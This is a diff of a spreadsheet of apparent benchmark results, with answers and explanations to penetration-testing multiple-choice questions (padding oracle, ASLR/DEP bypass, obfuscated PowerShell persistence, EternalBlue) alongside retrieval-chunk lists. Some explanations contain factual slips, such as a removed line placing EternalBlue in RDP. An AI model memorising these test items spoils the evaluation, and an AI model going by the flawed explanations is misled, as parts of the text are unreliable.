+Explanation: A Padding Oracle Attack is the most effective in this scenario because it specifically exploits vulnerabilities related to how padding is checked and managed during decryption in cipher block chaining (CBC) mode. It allows an attacker to decrypt data by making adaptive guesses and observing the responses to these guesses from the target system, ultimately revealing the plaintext. The bit flipping attack, although relevant to CBC mode, primarily involves manipulating encrypted data to alter the plaintext, rather than exploiting padding directly. A replay attack involves retransmitting valid data to perform unauthorized actions, and a man-in-the-middle attack involves intercepting and possibly altering communications between two parties; neither focus specifically on shortcomings in encryption padding handling, making them less suitable choices for this scenario.</t>
         </is>
       </c>
       <c r="G149" t="inlineStr">
@@ -10428,21 +9672,16 @@
 preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: c63b7be0-9513-4094-b110-716268eb972f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I149" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J149" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K149" t="inlineStr">
         <is>
@@ -10481,7 +9720,7 @@
       <c r="F150" t="inlineStr">
         <is>
           <t>Answer: Dynamic analysis with a debugger attached to monitor exploitation
-Explanation: Dynamic analysis with a debugger, such as using GDB or OllyDbg, is crucial for developing and testing exploits, particularly when bypassing Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). This method allows the attacker to observe how the target software reacts in real-time as different payloads and techniques are employed, offering immediate feedback on the exploit's effectiveness and behavior under real conditions. This real-time observation is vital for fine-tuning the exploit to effectively bypass these defenses. Static code analysis, while useful for an initial understanding of potential vulnerabilities, does not provide direct feedback during exploitation. Automated vulnerability scanning without interaction with the product code lacks the depth needed for exploit development specific to ASLR and DEP. Monitoring network traffic between the target application and the attacker can provide insights into the external communications but does not directly assist in the internal mechanics of bypassing ASLR and DEP.</t>
+Explanation: Dynamic analysis with a debugger, such as using GDB or OllyDbg, is crucial for developing and testing exploits, particularly when bypassing Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). This method allows the attacker to observe how the target software reacts in real-time as different payloads and techniques are employed, offering immediate feedback on the exploit's effectiveness and behavior under real conditions. This real-time observation is vital for fine-tuning the exploit to effectively bypass these defenses. Static code analysis, while useful for an initial understanding of potential vulnerabilities, does not provide direct feedback during exploitation. Automated vulnerability scanning without interaction with the product code and monitoring network traffic between the target application and the attacker may provide some information but do not offer the same level of real-time feedback as dynamic analysis with a debugger attached.</t>
         </is>
       </c>
       <c r="G150" t="inlineStr">
@@ -10495,21 +9734,16 @@
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 5f1aed82-6985-429f-a6a1-e86bd394b0ff, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I150" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J150" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K150" t="inlineStr">
         <is>
@@ -10548,7 +9782,7 @@
       <c r="F151" t="inlineStr">
         <is>
           <t>Answer: Performing static code analysis on the executable
-Explanation: Performing static code analysis on the executable is the most effective initial approach when dealing with an unknown potentially malicious file. This technique involves reviewing the executable's code without running it, thereby avoiding the activation of any malicious payloads it might carry. This is critical in understanding the behavior of the executable and identifying potential malicious activities before executing the code. While analyzing network traffic can provide insights into external communications, using a debugger to monitor registry changes or automated vulnerability scanning tools may not directly assist in understanding the internal mechanics of the executable.</t>
+Explanation: Performing static code analysis on the executable is the most effective initial approach when dealing with an unknown potentially malicious file. This technique involves reviewing the executable's code without running it, thereby avoiding the activation of any malicious payloads it might carry. This is critical in understanding the behavior of the executable and identifying potential malicious activities. While using a debugger can be useful for inspecting the behavior during execution, analyzing network traffic may not directly assist in understanding the internal mechanics of the executable, and automated vulnerability scanning tools are more suited for initial reconnaissance rather than deep exploit development specific to ASLR and DEP.</t>
         </is>
       </c>
       <c r="G151" t="inlineStr">
@@ -10562,21 +9796,16 @@
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I151" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J151" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K151" t="inlineStr">
         <is>
@@ -10615,7 +9844,7 @@
       <c r="F152" t="inlineStr">
         <is>
           <t>Answer: Metasploit Framework
-Explanation: The Metasploit Framework is the correct choice because it is a powerful tool designed primarily for developing and executing exploit code against a remote target machine. It also includes advanced payload encoding capabilities, which helps in evading common detection mechanisms such as anti-virus software. Wireshark is incorrect as it is a packet analyzer used for network troubleshooting and analysis, rather than exploitation. Burp Suite is a web application security testing tool, focused on interacting with web applications to identify vulnerabilities, not on exploiting vulnerabilities in general IT infrastructure. PowerShell Empire is a post-exploitation framework that focuses on maintaining persistence and command-and-control over compromised systems, but it does not facilitate the direct development or execution of exploits against remote targets.</t>
+Explanation: The Metasploit Framework is the correct answer because it is a widely used tool for developing and testing exploit code, particularly in red teaming contexts where assessing the security of remote systems is crucial. It provides users with the ability to craft, test, and execute payloads in a controlled and modular fashion, which is essential for successful exploitation in a red team scenario. While Wireshark is primarily a network protocol analyzer, PowerShell Empire focuses on command-and-control (C2) capabilities, and Burp Suite is predominantly used for web application security testing, Metasploit is specifically designed for developing and executing exploit code against remote target machines.</t>
         </is>
       </c>
       <c r="G152" t="inlineStr">
@@ -10629,21 +9858,16 @@
 preemware_pentestingeval.pdf (Chunk: 76451418-5bee-4e13-b950-55a69470f2ad, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 94a5825c-3c24-4426-98b6-0f15dd480b28, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 83e98874-cd3b-47fc-9052-268ced6cea53, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I152" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J152" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K152" t="inlineStr">
         <is>
@@ -10682,10 +9906,7 @@
       <c r="F153" t="inlineStr">
         <is>
           <t>Answer: Examining network traffic for unrecognized protocols
-Explanation: Examining network traffic for unrecognized protocols is the most effective strategy for detecting
-APTs during a penetration testing assignment. This method involves analyzing network traffic to identify any
-unusual or unknown protocols that might be used by attackers to communicate with compromised systems, exfiltrate data, or issue commands. These tactics are common in sophisticated cyber attacks and can help
-identify potential APT activities before they cause significant damage.</t>
+Explanation: Examining network traffic for unrecognized protocols is the most effective strategy for detecting APTs during a penetration testing assignment. This method focuses on identifying unusual network protocols that might be used by attackers to communicate with compromised systems, exfiltrate data, or issue commands, which are common tactics in sophisticated cyber attacks. Analyzing code patterns and importing anomalies, although useful, may not catch all APT activities as they often mimic legitimate behavior. Monitoring for abnormal system resource usage can be helpful but is less specific to APTs, while tracking large outbound data transfers might miss some stealthier exfiltration techniques.</t>
         </is>
       </c>
       <c r="G153" t="inlineStr">
@@ -10699,21 +9920,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I153" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J153" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K153" t="inlineStr">
         <is>
@@ -10752,7 +9968,7 @@
       <c r="F154" t="inlineStr">
         <is>
           <t>Answer: Using PowerShell scripts that are heavily obfuscated
-Explanation: In a red team operation, maintaining persistence on a network without raising suspicion from network defense systems is crucial. Among the given options, using PowerShell scripts that are heavily obfuscated is the most effective technique. Obfuscating these scripts makes them harder to detect and analyze by intrusion detection systems or security analysts. While exploiting known vulnerabilities can be effective, it may not always be possible to find such vulnerabilities in a target system. DDoS attacks can indeed consume resources but are more likely to trigger alarms and defenses rather than maintain persistence stealthily. Social engineering attacks can provide initial access but do not inherently ensure long-term persistence or stealth.</t>
+Explanation: In a red team operation, maintaining persistence on a network without arising suspicion from network defense systems is critical. Among the provided options, using PowerShell scripts that are heavily obfuscated is the most effective technique. Obfuscating these scripts makes them harder to detect and analyze by intrusion detection systems or security analysts. While exploiting known vulnerabilities can provide initial access, it may not be as stealthy or persistent as obfuscated PowerShell scripts. Executing large-volume DDoS attacks might draw attention and trigger defensive measures, while implementing social engineering attacks is more focused on obtaining initial access rather than maintaining persistence without detection.</t>
         </is>
       </c>
       <c r="G154" t="inlineStr">
@@ -10766,21 +9982,16 @@
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 608f8017-318e-4a0f-9ce4-2b9b37ef7214, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I154" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J154" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K154" t="inlineStr">
         <is>
@@ -10819,13 +10030,7 @@
       <c r="F155" t="inlineStr">
         <is>
           <t>Answer: Failing to check the length of input data
-Explanation: A buffer overflow occurs when a program writes more data to a buffer than it can hold, leading to
-data corruption and potentially allowing an attacker to execute arbitrary code. This is most likely to happen
-when there is no proper checking of the length of input data, as this allows for more data to be written into the
-buffer than it was designed to handle. Using an undefined uninitialized variable can also lead to issues but is
-not directly related to buffer overflow vulnerabilities. Recompiling software from source without code review
-may introduce new vulnerabilities, but it does not specifically cause buffer overflows. Changing file permissions
-to root may grant elevated privileges but does not inherently create a buffer overflow vulnerability.</t>
+Explanation: A buffer overflow occurs when a program writes more data to a buffer than it can hold, leading to extra data being written into adjacent buffers. This can corrupt or overwrite valid data held in them, including data that controls program execution. By not checking the length of input data, attackers can exploit this vulnerability by injecting more data than the buffer can handle, causing a buffer overflow and potentially allowing arbitrary code execution. Using an undefined uninitialized variable, recompiling software from source without code review, or changing file permissions to root may also introduce vulnerabilities, but they are less likely to directly cause a buffer overflow compared to failing to check the length of input data.</t>
         </is>
       </c>
       <c r="G155" t="inlineStr">
@@ -10839,21 +10044,16 @@
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 66d16429-d931-4984-bd59-02b90fff1053, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I155" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J155" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K155" t="inlineStr">
         <is>
@@ -10892,7 +10092,7 @@
       <c r="F156" t="inlineStr">
         <is>
           <t>Answer: SQL Injection using UNION query
-Explanation: SQL Injection using UNION query is the most effective technique for exploiting an outdated SQL server specifically within a web application context. This method allows an attacker to inject a SQL UNION query designed to retrieve additional, unauthorized data from the database, potentially giving access to sensitive information or even executing arbitrary code, depending on the database's configuration and the nature of the vulnerability.</t>
+Explanation: SQL Injection using UNION query is the correct answer as it involves injecting malicious SQL statements into an input field for execution, which can manipulate a database to execute arbitrary code, depending on the database's configuration and the nature of the vulnerability. This method does not typically require prior authentication to the web application, making it a highly effective attack vector for gaining unauthorized access and executing code. Buffer overflow in a local program, while potent for code execution, generally requires local access or at least some interaction with the affected software on the target server. Phishing campaigns and cross-site scripting primarily target user data and client browsers, respectively, and typically do not result in direct arbitrary code execution on a server.</t>
         </is>
       </c>
       <c r="G156" t="inlineStr">
@@ -10906,21 +10106,16 @@
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3f225d2c-0ef3-4965-b92e-6d8835cde99d, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c5ddafd2-8e53-4743-8d2a-c26ad6e16928, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 72afb988-5c0b-4173-ac34-2220ef8a72e9, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c5ddafd2-8e53-4743-8d2a-c26ad6e16928, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I156" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J156" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K156" t="inlineStr">
         <is>
@@ -10973,21 +10168,16 @@
 preemware_pentestingeval.pdf (Chunk: bf89b19f-54ce-4995-8751-2aba1ebabf11, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4e5b79c1-1f7a-487a-969b-e826f89f1cdf, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d83b16e3-cab4-4909-9965-40af03525749, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 910ca37f-8473-43ad-8ff6-39a3367872c4, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: sparse, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: e42608c6-39af-4dee-af44-6fe9b8321000, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 54029d28-0316-4b60-b3a4-46cb1d3ed1b7, Type: sparse, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: 974c40f1-541e-4fbb-9528-9a36ca484597, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d83b16e3-cab4-4909-9965-40af03525749, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I157" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J157" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K157" t="inlineStr">
         <is>
@@ -11026,7 +10216,7 @@
       <c r="F158" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow
-Explanation: A buffer overflow occurs when data exceeds the memory buffer's boundary and overwrites adjacent memory locations. This can lead to arbitrary code execution if carefully manipulated, making it a common exploit technique in exploit development. While use-after-free vulnerabilities and integer overflows can also lead to arbitrary code execution, they typically involve improper use of allocated memory or unexpected variable values rather than directly manipulating the handling of dynamically allocated memory. SQL injection and cross-site scripting are primarily exploited in web application contexts and affect the application layer rather than interacting directly with memory management mechanisms such as buffer overflows.</t>
+Explanation: A buffer overflow occurs when data exceeds the memory buffer's boundary and overwrites adjacent memory locations. This can be exploited by attackers to execute arbitrary code by manipulating the handling of dynamically allocated memory. Use-after-free vulnerabilities, SQL injection, and cross-site scripting are related security issues but do not specifically involve manipulating dynamic memory allocation mechanisms for arbitrary code execution.</t>
         </is>
       </c>
       <c r="G158" t="inlineStr">
@@ -11040,21 +10230,16 @@
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: bf89b19f-54ce-4995-8751-2aba1ebabf11, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: da8d5790-4c9c-4230-96d7-cd1f71b7c89c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I158" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J158" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K158" t="inlineStr">
         <is>
@@ -11093,7 +10278,7 @@
       <c r="F159" t="inlineStr">
         <is>
           <t>Answer: EternalBlue (CVE-2017-0144)
-Explanation: EternalBlue (CVE-2017-0144) is the correct answer. This vulnerability affects Microsoft's Windows operating systems and involves a memory corruption flaw in the Remote Desktop Protocol. It allows for remote code execution, making it a prime target for attackers wanting to exploit these systems during a penetration test. Heartbleed (CVE-2014-0160) pertains to a vulnerability in the OpenSSL cryptographic software library, largely affecting information disclosure rather than facilitating a malware propagation mechanism like WannaCry. Shellshock (CVE-2014-6271) targets vulnerabilities in the Unix Bash shell, which is different in scope and exploitation context compared to the SMB protocol exploited by EternalBlue.</t>
+Explanation: EternalBlue (CVE-2017-0144) is the correct answer. This vulnerability affects Microsoft's SMBv1 protocol and allows for remote code execution, making it a prime target for attackers during a penetration test. It was exploited in the WannaCry ransomware attack to propagate across vulnerable systems. BlueKeep (CVE-2019-0708) is related to Remote Desktop Protocol and can also enable remote code execution, but it was not involved in the WannaCry attack. Heartbleed (CVE-2014-0160) targets the OpenSSL cryptographic software library and primarily deals with information disclosure rather than facilitating a malware propagation mechanism like WannaCry. Shellshock (CVE-2014-6271) targets vulnerabilities in the Unix Bash shell, which is different in scope and exploitation context compared to the SMB protocol exploited by EternalBlue.</t>
         </is>
       </c>
       <c r="G159" t="inlineStr">
@@ -11107,21 +10292,16 @@
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 36e54dab-ab32-4509-abd8-e70613c1ce77, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 863931e2-a680-4ee8-846b-f4053787bdc1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 7b4d8289-6113-4807-b123-d481e481c42c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 18e2ae8c-7b32-42a9-9045-7872388878c2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 36e54dab-ab32-4509-abd8-e70613c1ce77, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I159" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J159" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K159" t="inlineStr">
         <is>
@@ -11160,7 +10340,7 @@
       <c r="F160" t="inlineStr">
         <is>
           <t>Answer: Rootkit installation using privilege escalation
-Explanation: Rootkit installation using privilege escalation is often used by sophisticated attackers in the context of advanced persistent threats to maintain long-term access. A rootkit allows an attacker to gain or maintain privileged access to a system, which can be used to install backdoors or other malicious software that can persist undetected through reboots and evade common security measures. While shellcode injection via buffer overflow vulnerability, SQL injection leading to data exfiltration, and cross-site scripting (XSS) to deploy a keylogger are all valid techniques used in APT scenarios, they do not inherently provide the same level of stealth and persistence as rootkit installation using privilege escalation.</t>
+Explanation: Rootkit installation using privilege escalation is often used by sophisticated attackers in the context of advanced persistent threats to maintain long-term access. A rootkit allows an attacker to gain or maintain unauthorized access to a system, and it can be designed to evade detection by traditional security measures. This technique provides the attacker with persistence on the compromised system, allowing them to continue their malicious activities without being easily detected. While SQL injection and cross-site scripting can also lead to data exfiltration or user session hijacking, they are not as effective in maintaining long-term access without detection as rootkit installation using privilege escalation.</t>
         </is>
       </c>
       <c r="G160" t="inlineStr">
@@ -11174,21 +10354,16 @@
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 4)
